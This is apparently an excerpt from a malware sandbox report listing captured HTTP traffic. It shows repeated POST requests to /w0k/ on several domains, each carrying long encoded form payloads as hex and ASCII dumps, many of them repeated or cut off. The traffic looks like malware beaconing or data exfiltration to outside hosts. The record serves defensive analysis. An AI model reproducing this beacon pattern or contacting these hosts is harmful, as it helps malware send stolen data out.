53 7a 70 79 75 5f 43 36 65 41 52 79 5a 41 37 4a 28 4e 4c 45 35 45 59 6a 35 66 30 7a 38 4c 63 4c 35 4a 34 4a 6a 4e 71 32 48 4e 45 67 6a 57 68 4f 7e 61 34 47 49 4a 39 62 76 37 41 76 74 6f 77 34 67 46 75 44 6b 69 7a 47 55 64 54 64 58 4a 78 50 35 47 6b 77 62 77 72 77 72 57 7a 77 43 68 79 58 6d 4c 69 41 6f 73 41 63 74 53 6a 33 56 30 34 71 65 5a 39 48 4a 43 44 59 75 50 4e 69 72 52 4a 4a 32 4f 50 74 39 77 69 63 51 47 65 65 70 66 78 56 58 6c 57 58 67 4c 37 70 30 72 39 4e 74 4d 46 38 75 50 
39 59 41 37 39 45 53 79 69 54 6a 53 38 78 59 7a 39 47 4e 36 35 44 52 37 48 67 6e 78 50 69 56 73 66 50 42 4c 62 46 4e 68 7e 45 54 34 54 64 32 69 39 4f 37 31 47 4a 30 58 6b 69 5a 31 57 4d 69 79 38 41 61 78 76 6c 4b 6a 51 68 45 79 68 50 70 4b 45 66 56 58 7e 6f 51 59 45 56 41 65 59 61 33 74 4b 42 62 78 51 39 79 54 36 36 6d 58 46 51 41 6d 38 51 31 4c 30 52 36 54 52 67 53 65 45 4e 37 2d 6d 5a 42 33 48 42 34 41 41 45 69 35 4c 51 4d 44 57 7a 52 78 32 4b 36 6b 4b 41 4f 72 57 6e 6f 34 4a 61 73 77 45 6d 4f 67 51 70 39 41 57 5f 54 72 51 5f 31 70 46 35 6f 31 64 79 78 49 6a 48 35 6b 51 33 36 55 6a 6c 70 70 76 47 77 6d 75 5f 7a 54 4a 37 41 42 66 46 34 59 6f 4d 71 35 32 73 28 47 6e 6f 73 49 72 36 7a 34 44 38 63 50 76 59 6a 62 7a 6c 50 44 66 4b 53 6c 78 56 49 56 4f 5a 32 4d 59 33 41 69 4c 55 4b 74 74 32 53 6d 43 33 50 41 4c 30 61 4a 64 71 35 77 6f 53 6b 33 38 68 28 53 36 43 43 70 47 32 35 69 56 42 6b 36 52 78 56 71 49 31 4e 6e 56 43 6f 35 44 77 64 72 61 33 57 4b 58 5a 34 69 6a 65 6c 57 37 38 33 6a 61 68 52 65 73 75 38 78 3
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 Data Ascii: Ttxh=Ca62EbGgpwvbUDoTdBZuST3R1baLzQ~cJQhC4W67BmzwPh6zg9B8TzbrZDTgenuG5aXkn8UuabaqhpRh5GqJDFRplw5JZDJe2SS5WKT-EGYyI8ZMbj2hxU44qFmkHCt4kl2c5hbW9ez7C
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 Data Ascii: Ttxh=Ca62EbGgpwvbUDoTdBZuST3R1baLzQ~cJQhC4W67BmzwPh6zg9B8TzbrZDTgenuG5aXkn8UuabaqhpRh5GqJDFRplw5JZDJe2SS5WKT-EGYyI8ZMbj2hxU44qFmkHCt4kl2c5hbW9ez7C
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 44 6f 55 4e 67 35 7e 45 77 51 53 7a 70 79 75 5f 43 36 65 41 52 79 5a 41 37 4a 28 4e 4c 45 35 45 59 6a 35 66 30 7a 38 4c 63 4c 35 4a 34 4a 6a 4e 71 32 48 4e 45 67 6a 57 68 4f 7e 61 34 47 49 4a 39 62 76 37 41 76 74 6f 77 34 67 46 75 44 6b 69 7a 47 55 64 54 64 58 4a 78 50 35 47 6b 77 62 77 72 77 72 57 7a 77 43 68 79 58 6d 4c 69 41 6f 73 41 63 74 53 6a 33 56 30 34 71 65 5a 39 48 4a 43 44 59 75 50 4e 69 72 52 4a 4a 32 4f 50 74 39 77 69 63 51 47 65 65 70 66 78 56 58 6c 57 58 67 4c 37 70 30 72 39 4e 74 4d 46 38 75 50 
39 59 41 37 39 45 53 79 69 54 6a 53 38 78 59 7a 39 47 4e 36 35 44 52 37 48 67 6e 78 50 69 56 73 66 50 42 4c 62 46 4e 68 7e 45 54 34 54 64 32 69 39 4f 37 31 47 4a 30 58 6b 69 5a 31 57 4d 69 79 38 41 61 78 76 6c 4b 6a 51 68 45 79 68 50 70 4b 45 66 56 58 7e 6f 51 59 45 56 41 65 59 61 33 74 4b 42 62 78 51 39 79 54 36 36 6d 58 46 51 41 6d 38 51 31 4c 30 52 36 54 52 67 53 65 45 4e 37 2d 6d 5a 42 33 48 42 34 41 41 45 69 35 4c 51 4d 44 57 7a 52 78 32 4b 36 6b 4b 41 4f 72 57 6e 6f 34 4a 61 73 77 45 6d 4f 67 51 70 39 41 57 5f 54 72 51 5f 31 70 46 35 6f 31 64 79 78 49 6a 48 35 6b 51 33 36 55 6a 6c 70 70 76 47 77 6d 75 5f 7a 54 4a 37 41 42 66 46 34 59 6f 4d 71 35 32 73 28 47 6e 6f 73 49 72 36 7a 34 44 38 63 50 76 59 6a 62 7a 6c 50 44 66 4b 53 6c 78 56 49 56 4f 5a 32 4d 59 33 41 69 4c 55 4b 74 74 32 53 6d 43 33 50 41 4c 30 61 4a 64 71 35 77 6f 53 6b 33 38 68 28 53 36 43 43 70 47 32 35 69 56 42 6b 36 52 78 56 71 49 31 4e 6e 56 43 6f 35 44 77 64 72 61 33 57 4b 58 5a 34 69 6a 65 6c 57 37 38 33 6a 61 68 52 65 73 75 38 78 3
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 44 6f 55 4e 67 35 7e 45 77 51 53 7a 70 79 75 5f 43 36 65 41 52 79 5a 41 37 4a 28 4e 4c 45 35 45 59 6a 35 66 30 7a 38 4c 63 4c 35 4a 34 4a 6a 4e 71 32 48 4e 45 67 6a 57 68 4f 7e 61 34 47 49 4a 39 62 76 37 41 76 74 6f 77 34 67 46 75 44 6b 69 7a 47 55 64 54 64 58 4a 78 50 35 47 6b 77 62 77 72 77 72 57 7a 77 43 68 79 58 6d 4c 69 41 6f 73 41 63 74 53 6a 33 56 30 34 71 65 5a 39 48 4a 43 44 59 75 50 4e 69 72 52 4a 4a 32 4f 50 74 39 77 69 63 51 47 65 65 70 66 78 56 58 6c 57 58 67 4c 37 70 30 72 39 4e 74 4d 46 38 75 50 
39 59 41 37 39 45 53 79 69 54 6a 53 38 78 59 7a 39 47 4e 36 35 44 52 37 48 67 6e 78 50 69 56 73 66 50 42 4c 62 46 4e 68 7e 45 54 34 54 64 32 69 39 4f 37 31 47 4a 30 58 6b 69 5a 31 57 4d 69 79 38 41 61 78 76 6c 4b 6a 51 68 45 79 68 50 70 4b 45 66 56 58 7e 6f 51 59 45 56 41 65 59 61 33 74 4b 42 62 78 51 39 79 54 36 36 6d 58 46 51 41 6d 38 51 31 4c 30 52 36 54 52 67 53 65 45 4e 37 2d 6d 5a 42 33 48 42 34 41 41 45 69 35 4c 51 4d 44 57 7a 52 78 32 4b 36 6b 4b 41 4f 72 57 6e 6f 34 4a 61 73 77 45 6d 4f 67 51 70 39 41 57 5f 54 72 51 5f 31 70 46 35 6f 31 64 79 78 49 6a 48 35 6b 51 33 36 55 6a 6c 70 70 76 47 77 6d 75 5f 7a 54 4a 37 41 42 66 46 34 59 6f 4d 71 35 32 73 28 47 6e 6f 73 49 72 36 7a 34 44 38 63 50 76 59 6a 62 7a 6c 50 44 66 4b 53 6c 78 56 49 56 4f 5a 32 4d 59 33 41 69 4c 55 4b 74 74 32 53 6d 43 33 50 41 4c 30 61 4a 64 71 35 77 6f 53 6b 33 38 68 28 53 36 43 43 70 47 32 35 69 56 42 6b 36 52 78 56 71 49 31 4e 6e 56 43 6f 35 44 77 64 72 61 33 57 4b 58 5a 34 69 6a 65 6c 57 37 38 33 6a 61 68 52 65 73 75 38 78 3
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.sebasview.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.sebasview.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sebasview.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 4f 51 39 4b 63 2d 41 4e 75 57 42 52 6d 41 4f 33 51 37 38 48 45 69 28 4a 4f 5f 72 69 61 30 64 44 59 63 70 4f 48 63 37 5a 56 74 67 72 68 53 70 49 51 43 64 45 47 65 55 78 38 5a 73 68 47 35 4b 44 68 6e 41 4b 39 77 33 55 37 57 75 6f 45 59 55 32 4e 49 51 48 34 37 4e 6c 4b 6f 6a 30 51 33 57 4c 39 77 47 55 59 72 58 78 71 62 32 69 47 44 41 34 49 7a 72 56 56 45 75 68 69 66 33 2d 56 36 58 49 53 57 30 50 6f 5f 50 37 73 48 6c 6c 7a 36 77 6c 4a 4a 4c 5f 41 34 6e 35 67 57 41 49 4e 58 6b 30 6a 74 39 68 51 39 4a 76 32 74 61 61 4e 59 43 33 68 30 66 54 50 68 59 41 65 63 6f 33 59 70 55 76 72 58 41 36 7a 71 50 44 45 5a 38 73 36 34 49 7a 46 49 30 69 38 37 7e 68 4e 59 66 45 69 41 66 79 74 5a 4d 76 34 58 32 51 71 6a 35 4f 4f 30 46 68 70 32 51 47 77 59 62 69 6f 61 5a 55 32 7a 79 47 35 70 4c 63 6f 61 76 71 6b 6a 77 53 7a 42 46 51 41 75 7e 61 49 6f 51 30 7a 30 4e 63 42 6c 35 62 6e 6b 6b 55 76 57 5a 36 78 62 43 53 4e 54 78 36 79 4e 30 53 6a 41 4d 36 6c 51 78 6f 71 58 69 6c 6e 41 30 34 70 47 4d 57 57 58 77 65 77 42 36 56 67 61 45 6b 33 4f 35 50 57 4d 58 2d 28 4a 74 30 30 4a 4c 50 73 5f 35 6f 30 2d 34 6e 51 53 47 47 66 34 6c 58 58 47 37 70 31 78 6e 45 48 36 58 48 32 5f 45 5a 75 4e 6f 54 6f 65 53 72 35 35 51 5f 33 72 6c 37 47 7a 4b 38 65 56 44 36 62 4f 5a 6b 70 43 54 70 7e 4a 66 52 71 5f 45 34 78 39 44 51 45 54 67 37 67 55 57 4f 34 32 32 55 33 6e 41 59 36 41 73 6d 42 39 59 6d 75 4a 45 52 51 76 53 48 69 38 51 45 36 31 6c 4e 4c 30 7e 78 47 53 46 39 70 34 34 49 35 30 37 2d 32 4d 49 70 46 56 31 62 4f 47 74 36 36 5f 63 44 72 51 37 45 6b 76 31 59 62 5a 77 72 61 54 6b 6d 
59 4d 70 51 63 44 77 76 72 6b 69 67 74 6c 51 36 48 61 31 46 7a 52 73 6d 42 72 35 69 44 37 47 39 76 31 43 59 56 31 6a 51 69 50 6a 43 49 66 73 71 41 4d 31 4c 7e 4f 73 55 37 39 52 49 4f 6f 4b 49 64 77 70 38 33 31 77 57 53 31 70 6d 6b 49 28 63 69 67 4c 36 48 51 33 65 4f 42 66 6d 64 38 42 75 4f 56 41 46 51 78 36 48 4b 6b 47 33 72 49 48 38 68 57 46 70 61 50 73 59 75 39 34 50 46 46 65 70 43 57 39 35 75 6a 28 70 76 77 59 32 31 5a 63 68 34 2d 71 56 4d 55 37 69 6d 30 64 6e 4f 55 51 75 76 34 74 51 4b 74 38 67 35 79 56 76 72 70 69 66 74 34 67 5f 4a 56 4d 44 6d 34 51 32 45 6b 4c 6f 74 31 30 44 57 36 66 72 51 72 69 52 4b 70 33 75 75 64 39 76 36 56 33 73 6d 67 62 45 6c 51 6c 50 44 42 4e 49 7a 54 6b 67 4e 66 6b 41 4e 6e 50 4e 54 43 72 65 41 61 5a 74 54 61 5a 48 39 32 4a 58 5a 4f 70 2d 57 73 4b 66 44 64 34 37 36 34 7e 66 37 6b 4d 6d 78 4e 35 48 62 75 34 4d 51 79 46 74 35 42 6d 49 6b 68 35 58 62 30 4b 45 6c 78 58 39 79 55 7a 6a 73 46 57 6c 66 6e 36 4e 45 33 58 70 78 2d 49 78 43 45 58 61 4f 58 68 65 7a 55 71 55 79 4e 36 50 6
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.michalshahar.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.michalshahar.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.michalshahar.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 6e 73 78 76 34 53 67 33 52 4a 4d 30 6a 4c 4a 4e 41 53 28 6c 76 65 39 4d 41 51 39 6e 6b 38 54 67 45 2d 36 6f 46 4d 55 70 4d 39 4b 42 55 43 49 53 75 4f 38 34 4f 5a 6d 57 65 4c 76 41 69 4b 75 72 6a 50 7a 4c 34 57 41 61 36 77 53 62 34 41 68 49 67 74 64 74 6d 5f 65 33 4f 31 72 49 45 61 57 58 44 54 38 45 53 57 36 6a 32 4d 61 4c 76 67 4e 63 55 49 48 63 57 6b 31 55 4e 30 79 78 51 36 59 36 4d 5a 78 4f 53 46 70 4b 6b 47 76 6e 28 6e 68 4f 75 69 71 79 57 61 36 4a 66 4e 63 30 39 56 52 4a 77 54 32 62 42 30 54 70 6d 4d 49 49 34 38 6e 31 58 64 73 4c 5a 41 67 6e 4f 4d 62 78 44 76 44 57 6a 41 61 64 46 51 56 73 45 53 69 75 61 77 51 5a 62 4a 46 6b 68 31 55 77 51 69 31 4c 46 42 49 49 62 68 50 76 4a 6a 39 50 4b 61 69 4a 41 4a 4f 45 6d 6a 37 7a 37 64 4c 50 46 6b 6a 6e 76 4d 4f 63 47 53 77 66 4f 54 44 54 6c 66 6b 69 66 42 4f 67 68 74 75 68 47 42 7e 48 74 78 68 52 5a 57 63 69 62 63 72 50 31 6b 41 71 6f 74 52 48 6d 64 44 34 4d 45 39 42 41 59 4c 33 69 46 61 32 57 43 70 41 58 52 32 33 4d 6d 33 49 73 45 43 32 6f 55 54 73 74 72 41 61 71 44 57 67 28 68 53 71 79 4b 7e 6e 69 5f 6a 78 32 35 44 70 45 47 71 54 77 51 51 54 6d 70 4c 33 42 51 33 6a 52 54 57 61 67 57 58 4a 4d 42 62 68 50 4e 6e 58 51 35 31 4e 6e 75 50 32 55 50 71 6b 47 61 45 50 6b 37 6a 65 32 53 6c 64 36 4f 6f 6d 59 31 4f 48 66 47 59 4b 43 78 65 48 76 6b 58 62 78 75 4a 6b 46 4a 4d 6d 51 56 76 4f 4a 77 6c 6c 70 77 54 78 41 50 59 5a 6d 34 49 4a 54 32 77 6e 41 33 64 69 6a 43 6f 5a 46 78 48 6c 52 55 32 31 37 79 37 73 65 6d 4f 53 76 74 73 7a 51 2d 4a 2d 76 67 45 72 43 39 59 35 74 52 6d 70 78 4e 45 4e 4c 
39 6f 42 73 76 72 73 69 7a 54 2d 62 33 7a 38 65 69 44 68 70 61 70 66 41 6b 4f 36 49 68 33 53 56 74 47 59 4e 4f 4d 46 30 31 77 77 75 50 6f 68 34 57 62 31 49 77 48 61 69 53 69 4a 39 51 28 50 43 43 53 37 68 52 6c 38 59 55 28 56 63 4c 55 66 79 55 45 52 6e 4d 70 75 32 4c 72 42 6b 6c 68 35 6c 58 75 41 4c 4d 76 33 63 76 52 67 77 74 58 6c 47 45 70 67 77 56 4f 63 42 34 75 50 62 30 77 76 6a 78 52 6f 72 56 42 78 6f 6f 38 6f 33 66 57 77 73 50 6f 66 50 34 4b 64 30 34 37 76 65 67 6e 6a 30 66 47 30 51 61 7e 35 44 6f 55 5a 69 6f 5a 49 39 57 4f 63 78 78 7e 34 49 33 67 4b 6b 70 62 71 7a 78 47 53 48 32 7e 63 67 38 77 2d 58 33 4f 6f 72 68 68 5a 49 53 41 6c 78 38 39 6d 4d 42 6b 49 56 48 4b 4b 50 7a 4e 4c 49 31 4e 52 58 39 50 75 32 51 52 5f 71 66 36 44 69 6b 5a 73 65 4c 4d 47 55 6f 7a 65 6a 33 30 2d 38 54 73 63 51 64 4c 35 64 57 28 53 66 52 39 7a 30 76 6a 47 78 6b 74 73 67 32 74 55 56 39 72 37 59 51 6f 50 64 79 56 6b 37 56 74 55 30 35 44 65 63 72 49 45 50 75 35 32 46 5f 70 47 6f 41 72 46 41 70 55 77 58 41 79 36 59 63 47 4e 61 4
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.nacemo.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.nacemo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nacemo.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 6b 38 71 45 6e 51 61 70 4e 58 48 6f 66 57 35 68 64 4b 52 4b 4b 32 45 2d 67 36 6f 32 4e 64 74 78 78 78 44 6e 50 37 68 5f 56 68 4d 78 33 63 7a 59 61 31 43 48 6c 6b 4b 61 73 73 56 74 37 59 5a 59 72 6f 61 78 38 4c 6a 65 6d 72 7e 74 51 6e 35 39 68 70 4f 45 69 36 38 65 59 33 44 39 4e 79 7a 34 44 65 59 43 52 78 5a 6f 50 72 59 5f 63 42 59 41 78 47 66 65 48 66 33 56 38 53 43 39 59 6b 77 38 38 74 49 65 69 2d 36 73 4b 74 36 61 35 34 79 63 68 68 51 71 50 76 53 2d 53 68 57 47 71 4b 71 54 4f 6c 4a 7a 6d 39 62 53 45 73 31 49 61 45 36 63 69 39 44 6a 54 4b 34 4d 62 78 66 70 4d 74 51 31 32 35 55 45 72 55 78 44 58 74 43 57 66 4e 6c 49 78 61 53 72 73 4f 33 53 49 69 34 49 6a 79 6f 79 39 34 7a 51 45 53 7e 74 32 34 52 51 4c 71 49 44 49 57 70 77 70 77 4b 34 4e 48 61 77 4e 50 5a 4d 36 74 44 6f 6a 2d 37 59 44 6b 55 31 68 36 46 56 30 38 56 32 34 38 75 50 36 64 32 57 57 77 4a 49 50 62 63 55 59 74 50 4d 74 45 72 49 67 4f 6f 32 54 6c 47 57 49 53 42 41 47 4a 49 32 7a 6d 7e 4d 4b 54 30 79 55 64 4f 4a 5a 2d 59 64 38 64 51 56 44 5f 42 6e 42 31 76 7a 33 64 56 64 45 31 28 5f 4d 52 71 68 4d 61 71 65 51 6a 58 6b 70 2d 79 65 4b 6b 65 54 79 63 46 77 71 63 70 36 61 77 39 49 62 6d 31 4f 4c 39 36 59 58 33 53 78 62 59 68 41 31 35 55 39 4c 75 46 43 68 59 50 41 38 39 44 69 72 46 58 70 69 35 78 4a 5a 70 4b 34 6b 38 57 74 4c 4c 4c 36 34 34 7a 51 7a 65 5a 32 4d 39 66 45 67 42 70 6e 53 46 68 4f 51 66 70 6e 76 71 41 41 72 6c 33 41 48 72 30 79 4e 6a 39 42 53 7a 38 4a 37 4d 37 79 6c 73 65 36 64 68 6d 72 68 35 5a 58 59 79 6c 44 6d 6f 5a 73 64 55 4c 2d 66 6d 28 76 55 61 5a 37 64 67 43 67 69 35 4b 
67 53 35 72 48 42 56 4d 54 39 55 72 51 78 44 77 4a 6f 54 46 51 31 41 56 42 41 56 6d 6c 37 30 6c 4e 52 2d 42 75 53 46 77 6f 37 41 30 59 35 31 59 6d 53 50 31 49 49 54 4e 4f 53 4a 76 56 33 72 71 36 75 65 6f 30 59 68 72 42 30 38 58 42 6d 71 38 38 37 42 35 31 62 2d 46 44 77 65 79 6a 45 4f 70 65 59 46 61 45 36 6a 4e 74 4c 73 4a 44 4f 52 4d 52 78 4d 74 7a 68 6d 30 71 4a 76 55 74 4e 34 67 58 30 73 34 74 6b 58 6a 51 61 6e 6c 36 50 35 6f 61 4f 59 32 78 6f 50 55 59 78 76 55 71 5a 5f 4d 44 62 6c 4b 66 51 46 69 62 36 6f 4d 55 41 4b 73 65 31 48 41 4c 47 31 4d 5f 61 66 47 66 50 6e 59 78 74 4a 64 6d 33 6b 36 4b 41 6e 4e 75 4e 6f 6b 43 43 38 37 35 55 66 6b 31 52 6a 4b 63 42 74 30 37 62 66 59 38 6c 69 62 4b 79 31 32 37 50 52 7e 65 34 38 37 34 39 30 65 4c 65 43 4c 6e 4f 65 49 58 71 32 6d 6b 77 51 31 6a 44 63 59 65 36 43 37 57 66 64 35 44 67 5a 30 4e 72 33 32 59 50 63 70 6a 4e 49 77 51 71 6b 47 5a 65 53 70 5f 6a 57 43 45 52 59 4d 41 32 70 74 44 70 7a 30 32 6f 61 6e 70 6f 37 46 63 34 6e 49 6d 65 38 30 70 58 30 46 4c 56 41 61 6
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.workingtechnologiesmexico.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.workingtechnologiesmexico.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.workingtechnologiesmexico.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 55 44 4d 4f 73 6b 44 45 4e 5a 6e 65 65 65 5a 6d 52 7a 61 73 41 73 75 47 75 73 35 61 76 78 62 6a 33 4a 51 55 7e 64 35 4f 34 57 69 32 61 48 74 35 4d 37 41 55 6a 71 73 4d 49 5a 50 57 71 34 42 59 35 31 74 44 67 4a 55 66 58 69 6b 57 50 45 4c 62 6a 48 42 48 74 57 65 4f 43 70 46 6a 39 73 67 47 68 4c 70 41 57 6c 70 4e 72 4b 31 43 43 6e 48 54 65 4e 31 34 32 2d 4b 61 6c 39 66 56 6c 5f 64 55 76 53 74 4e 6e 38 4d 59 66 4d 54 76 52 50 6d 5f 57 31 34 66 31 7a 51 38 7a 64 58 77 45 53 4d 34 49 41 6b 48 55 68 4d 76 58 73 57 5f 43 47 46 73 42 6e 45 31 28 62 46 52 4f 5a 66 67 4d 51 58 30 67 38 61 74 38 39 34 6d 6e 68 45 44 6f 4b 44 77 74 67 74 39 70 42 49 36 73 7a 4e 67 44 37 34 42 7a 74 4b 45 69 42 50 48 67 32 34 39 59 41 54 4f 61 7a 62 34 31 5f 66 77 52 77 65 4d 36 45 44 77 66 62 63 30 7a 4c 6c 71 52 4f 65 64 67 50 6c 56 43 57 38 70 4d 30 71 33 43 6d 74 68 30 44 70 35 31 5a 54 51 58 67 49 68 77 65 6a 4e 79 6f 77 67 39 55 54 47 77 4f 54 58 34 50 4f 79 59 39 34 48 7a 45 48 6d 6f 35 77 54 51 36 33 57 63 42 37 35 41 37 41 68 6b 77 5a 2d 47 6d 68 47 33 48 52 69 63 74 59 74 47 54 64 34 78 33 6f 78 72 4e 73 2d 68 35 5a 35 42 43 38 73 73 35 45 30 31 55 48 42 62 32 65 42 55 45 65 35 57 43 42 75 6f 66 4b 67 4c 4e 6a 4b 74 6d 64 54 75 63 4c 74 57 78 35 74 48 55 72 5f 61 62 61 74 4c 6e 59 69 28 37 63 67 67 4b 52 30 67 5a 63 76 48 43 43 52 49 39 64 57 69 58 37 6f 56 65 66 69 79 6d 45 6a 68 31 63 32 4d 5f 32 72 72 41 51 4e 28 54 6e 76 58 67 61 56 43 30 6b 54 28 7a 48 46 69 75 51 78 78 44 34 2d 69 74 62 51 52 6d 4a 34 
